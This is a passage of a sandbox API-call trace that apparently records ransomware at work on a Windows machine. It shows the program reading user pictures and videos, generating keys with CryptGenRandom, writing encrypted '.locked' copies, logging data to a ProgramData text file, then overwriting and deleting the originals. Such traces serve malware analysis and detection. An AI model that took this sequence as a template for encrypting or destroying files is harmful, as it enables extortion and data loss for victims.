lpOverlapped=0x0) returned 1 [0315.604] CloseHandle (hObject=0x1c0) returned 1 [0315.605] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\6FI0Bk.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\6fi0bk.gif")) returned 1 [0315.617] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.681] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.685] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.724] SetEvent (hEvent=0x22c) returned 1 [0315.724] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12657a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12657a24*=0xc) returned 1 [0315.726] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.793] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\BahL errCaXXUL0.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\bahl errcaxxul0.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0315.793] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0315.793] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\BahL errCaXXUL0.jpg.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\bahl errcaxxul0.jpg.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0315.876] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0315.877] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0315.877] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e060 | out: pbBuffer=0x1234e060) returned 1 [0315.877] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0315.877] WriteFile (in: hFile=0x230, lpBuffer=0x12669000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12657d78, lpOverlapped=0x0 | out: lpBuffer=0x12669000*, lpNumberOfBytesWritten=0x12657d78*=0x80, lpOverlapped=0x0) returned 1 [0315.881] ReadFile (in: hFile=0x1c8, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x12657d68*=0x128e, lpOverlapped=0x0) returned 1 [0315.889] WriteFile (in: hFile=0x230, lpBuffer=0x12ba2000*, nNumberOfBytesToWrite=0x128e, lpNumberOfBytesWritten=0x12657d74, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesWritten=0x12657d74*=0x128e, lpOverlapped=0x0) returned 1 [0316.000] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0316.127] ReadFile (in: hFile=0x1c8, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x12657d68*=0x0, lpOverlapped=0x0) returned 1 [0316.127] CloseHandle (hObject=0x230) returned 1 [0316.127] CloseHandle (hObject=0x1c8) returned 1 [0316.127] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0316.127] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12657e94 | out: lpMode=0x12657e94) returned 0 [0316.127] WriteFile (in: hFile=0x1c8, lpBuffer=0x12380340*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x12657e64, lpOverlapped=0x0 | out: lpBuffer=0x12380340*, lpNumberOfBytesWritten=0x12657e64*=0x40, lpOverlapped=0x0) returned 1 [0316.127] CloseHandle (hObject=0x1c8) returned 1 [0316.128] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\BahL errCaXXUL0.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\bahl errcaxxul0.jpg")) returned 1 [0316.393] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0316.524] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0316.545] SetEvent (hEvent=0x20c) returned 1 [0316.545] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0316.647] SetEvent (hEvent=0x220) returned 1 [0316.647] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0316.649] SetEvent (hEvent=0x134) returned 1 [0316.649] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0316.693] SetEvent (hEvent=0x1f0) returned 1 [0316.693] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0316.760] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0316.760] SetEvent (hEvent=0x12c) returned 1 [0316.760] SetEvent (hEvent=0x220) returned 1 [0316.760] SetEvent (hEvent=0x20c) returned 1 [0316.760] ReadFile (in: hFile=0x200, lpBuffer=0x15cfe000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x15cfe000*, lpNumberOfBytesRead=0x12657d68*=0x152d0, lpOverlapped=0x0) returned 1 [0316.786] WriteFile (in: hFile=0x1a4, lpBuffer=0x15cfe000*, nNumberOfBytesToWrite=0x152d0, lpNumberOfBytesWritten=0x12657d74, lpOverlapped=0x0 | out: lpBuffer=0x15cfe000*, lpNumberOfBytesWritten=0x12657d74*=0x152d0, lpOverlapped=0x0) returned 1 [0316.802] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0316.977] ReadFile (in: hFile=0x200, lpBuffer=0x15cfe000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x15cfe000*, lpNumberOfBytesRead=0x12657d68*=0x0, lpOverlapped=0x0) returned 1 [0316.977] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0317.058] SetEvent (hEvent=0x190) returned 1 [0317.058] CloseHandle (hObject=0x1a4) returned 1 [0317.058] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0317.178] CloseHandle (hObject=0x200) returned 1 [0317.178] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0317.179] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x12657e94 | out: lpMode=0x12657e94) returned 0 [0317.179] WriteFile (in: hFile=0x200, lpBuffer=0x12702600*, nNumberOfBytesToWrite=0x77, lpNumberOfBytesWritten=0x12657e64, lpOverlapped=0x0 | out: lpBuffer=0x12702600*, lpNumberOfBytesWritten=0x12657e64*=0x77, lpOverlapped=0x0) returned 1 [0317.179] CloseHandle (hObject=0x200) returned 1 [0317.179] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\8GIqGvL1RnpDF.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\8giqgvl1rnpdf.png")) returned 1 [0317.253] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\8GIqGvL1RnpDF.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\8giqgvl1rnpdf.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0317.391] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0317.516] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x12657e88 | out: lpMode=0x12657e88) returned 0 [0317.516] WriteFile (in: hFile=0x1f4, lpBuffer=0x13d1a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12657e78, lpOverlapped=0x0 | out: lpBuffer=0x13d1a000*, lpNumberOfBytesWritten=0x12657e78*=0xfa000, lpOverlapped=0x0) returned 1 [0317.541] CloseHandle (hObject=0x1f4) returned 1 [0317.542] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\8GIqGvL1RnpDF.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\8giqgvl1rnpdf.png")) returned 1 [0317.548] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0317.653] SetEvent (hEvent=0x190) returned 1 [0317.653] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0317.717] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\MbZcvQXWXnb3nn6YXYz.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\mbzcvqxwxnb3nn6yxyz.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0317.723] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0318.253] SetEvent (hEvent=0x198) returned 1 [0318.253] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1276ae88 | out: lpMode=0x1276ae88) returned 0 [0318.253] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0318.301] WriteFile (in: hFile=0x1c8, lpBuffer=0x14540000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ae78, lpOverlapped=0x0 | out: lpBuffer=0x14540000*, lpNumberOfBytesWritten=0x1276ae78*=0xfa000, lpOverlapped=0x0) returned 1 [0318.496] CloseHandle (hObject=0x1c8) returned 1 [0318.504] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\MbZcvQXWXnb3nn6YXYz.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\mbzcvqxwxnb3nn6yxyz.mkv")) returned 1 [0318.532] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0318.540] SetEvent (hEvent=0x134) returned 1 [0318.540] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0318.578] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0318.895] SetEvent (hEvent=0x184) returned 1 [0318.895] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0318.898] SetEvent (hEvent=0x1ac) returned 1 [0318.898] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0318.928] SetEvent (hEvent=0x22c) returned 1 [0318.928] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0318.931] SetEvent (hEvent=0x214) returned 1 [0318.931] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0318.936] SetEvent (hEvent=0x1f0) returned 1 [0318.936] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0318.960] SetEvent (hEvent=0x104) returned 1 [0318.960] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0318.999] SetEvent (hEvent=0x21c) returned 1 [0318.999] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0319.149] SetEvent (hEvent=0x134) returned 1 [0319.149] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0319.236] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0319.236] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766030 | out: pbBuffer=0x12766030) returned 1 [0319.236] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0319.237] WriteFile (in: hFile=0x1a4, lpBuffer=0x16ccd000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e7d78, lpOverlapped=0x0 | out: lpBuffer=0x16ccd000*, lpNumberOfBytesWritten=0x125e7d78*=0x80, lpOverlapped=0x0) returned 1 [0319.240] ReadFile (in: hFile=0x200, lpBuffer=0x17e78000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x17e78000*, lpNumberOfBytesRead=0x125e7d68*=0x18d18, lpOverlapped=0x0) returned 1 [0319.246] WriteFile (in: hFile=0x1a4, lpBuffer=0x17e78000*, nNumberOfBytesToWrite=0x18d18, lpNumberOfBytesWritten=0x125e7d74, lpOverlapped=0x0 | out: lpBuffer=0x17e78000*, lpNumberOfBytesWritten=0x125e7d74*=0x18d18, lpOverlapped=0x0) returned 1 [0319.252] ReadFile (in: hFile=0x200, lpBuffer=0x17e78000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x17e78000*, lpNumberOfBytesRead=0x125e7d68*=0x0, lpOverlapped=0x0) returned 1 [0319.253] CloseHandle (hObject=0x1a4) returned 1 [0319.419] CloseHandle (hObject=0x200) returned 1 [0319.419] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0319.419] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x125e7e94 | out: lpMode=0x125e7e94) returned 0 [0319.419] WriteFile (in: hFile=0x200, lpBuffer=0x1234a340*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x125e7e64, lpOverlapped=0x0 | out: lpBuffer=0x1234a340*, lpNumberOfBytesWritten=0x125e7e64*=0x3a, lpOverlapped=0x0) returned 1 [0319.420] CloseHandle (hObject=0x200) returned 1 [0319.420] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\a55N4D.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\a55n4d.mp4")) returned 1 [0320.394] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0320.396] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0320.396] SetEvent (hEvent=0x150) returned 1 [0320.396] SetEvent (hEvent=0x134) returned 1 [0320.396] SetEvent (hEvent=0x21c) returned 1 [0320.396] SetEvent (hEvent=0x180) returned 1 [0320.400] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0320.405] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.405] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0320.409] SetEvent (hEvent=0x180) returned 1 [0320.409] SetEvent (hEvent=0x21c) returned 1 [0320.409] SetEvent (hEvent=0x1ac) returned 1 [0320.409] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.410] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0320.410] SetEvent (hEvent=0x150) returned 1 [0320.411] SetEvent (hEvent=0x1ac) returned 1 [0320.411] SetEvent (hEvent=0x21c) returned 1 [0320.429] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0320.433] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.433] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0320.433] SetEvent (hEvent=0x21c) returned 1 [0320.433] SetEvent (hEvent=0x1ac) returned 1 [0320.434] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0320.437] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.437] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0320.439] SetEvent (hEvent=0x1ac) returned 1 [0320.439] SetEvent (hEvent=0x1dc) returned 1 [0320.439] SetEvent (hEvent=0x220) returned 1 [0320.439] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.440] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0320.440] SetEvent (hEvent=0x150) returned 1 [0320.440] SetEvent (hEvent=0x220) returned 1 [0320.440] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\a55N4D.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\a55n4d.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0320.495] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.512] SetEvent (hEvent=0x22c) returned 1 [0320.512] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x125e7e88 | out: lpMode=0x125e7e88) returned 0 [0320.512] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.576] SetEvent (hEvent=0x21c) returned 1 [0320.576] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.616] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\dhKZR4KXAkkvWyD1_Aa.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\dhkzr4kxakkvwyd1_aa.avi")) returned 1 [0320.643] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.894] SetEvent (hEvent=0x21c) returned 1 [0320.894] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.941] SetEvent (hEvent=0x12c) returned 1 [0320.941] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0320.945] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.945] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0320.947] SetEvent (hEvent=0x1dc) returned 1 [0320.947] SetEvent (hEvent=0x22c) returned 1 [0320.947] SetEvent (hEvent=0x214) returned 1 [0320.947] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.949] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0320.950] SetEvent (hEvent=0x150) returned 1 [0320.950] SetEvent (hEvent=0x22c) returned 1 [0320.950] SetEvent (hEvent=0x214) returned 1 [0320.950] SetEvent (hEvent=0x1dc) returned 1 [0320.950] SetEvent (hEvent=0x104) returned 1 [0320.950] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0320.999] SetEvent (hEvent=0x220) returned 1 [0321.000] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.006] SetEvent (hEvent=0x22c) returned 1 [0321.006] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.042] SetEvent (hEvent=0x184) returned 1 [0321.042] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.077] WriteFile (in: hFile=0x1a4, lpBuffer=0x193f2000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dce78, lpOverlapped=0x0 | out: lpBuffer=0x193f2000*, lpNumberOfBytesWritten=0x125dce78*=0xfa000, lpOverlapped=0x0) returned 1 [0321.114] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.116] CloseHandle (hObject=0x1a4) returned 1 [0321.118] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\_wJ5AOb.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\_wj5aob.avi")) returned 1 [0321.203] SetEvent (hEvent=0x180) returned 1 [0321.203] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0321.206] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.206] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0321.208] SetEvent (hEvent=0x104) returned 1 [0321.208] SetEvent (hEvent=0x22c) returned 1 [0321.208] SetEvent (hEvent=0x190) returned 1 [0321.208] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.210] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0321.210] SetEvent (hEvent=0x150) returned 1 [0321.210] SetEvent (hEvent=0x190) returned 1 [0321.210] SetEvent (hEvent=0x22c) returned 1 [0321.210] SetEvent (hEvent=0x214) returned 1 [0321.210] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.225] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.242] SetEvent (hEvent=0x214) returned 1 [0321.242] SetEvent (hEvent=0x184) returned 1 [0321.242] SetEvent (hEvent=0x12c) returned 1 [0321.242] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.388] SetEvent (hEvent=0x214) returned 1 [0321.388] SetEvent (hEvent=0x190) returned 1 [0321.388] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.393] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.447] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0321.447] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392000 | out: pbBuffer=0x12392000) returned 1 [0321.447] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0321.448] WriteFile (in: hFile=0x1b0, lpBuffer=0x125fb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e5d78, lpOverlapped=0x0 | out: lpBuffer=0x125fb000*, lpNumberOfBytesWritten=0x125e5d78*=0x80, lpOverlapped=0x0) returned 1 [0321.451] ReadFile (in: hFile=0x1bc, lpBuffer=0x188e8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x188e8000*, lpNumberOfBytesRead=0x125e5d68*=0x8b51, lpOverlapped=0x0) returned 1 [0321.452] WriteFile (in: hFile=0x1b0, lpBuffer=0x188e8000*, nNumberOfBytesToWrite=0x8b51, lpNumberOfBytesWritten=0x125e5d74, lpOverlapped=0x0 | out: lpBuffer=0x188e8000*, lpNumberOfBytesWritten=0x125e5d74*=0x8b51, lpOverlapped=0x0) returned 1 [0321.513] SetEvent (hEvent=0x150) returned 1 [0321.513] ReadFile (in: hFile=0x1bc, lpBuffer=0x188e8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x188e8000*, lpNumberOfBytesRead=0x125e5d68*=0x0, lpOverlapped=0x0) returned 1 [0321.513] CloseHandle (hObject=0x1b0) returned 1 [0321.514] CloseHandle (hObject=0x1bc) returned 1 [0321.514] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0321.514] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x125e5e94 | out: lpMode=0x125e5e94) returned 0 [0321.514] WriteFile (in: hFile=0x1bc, lpBuffer=0x123801c0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x125e5e64, lpOverlapped=0x0 | out: lpBuffer=0x123801c0*, lpNumberOfBytesWritten=0x125e5e64*=0x34, lpOverlapped=0x0) returned 1 [0321.514] CloseHandle (hObject=0x1bc) returned 1 [0321.514] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\z2V-dpx2Rj7m2.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\z2v-dpx2rj7m2.flv")) returned 1 [0321.537] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0321.537] SetEvent (hEvent=0x184) returned 1 [0321.549] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\z2V-dpx2Rj7m2.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\z2v-dpx2rj7m2.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0321.552] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.572] SetEvent (hEvent=0x220) returned 1 [0321.572] GetConsoleMode (in: hConsoleHandle=0x240, 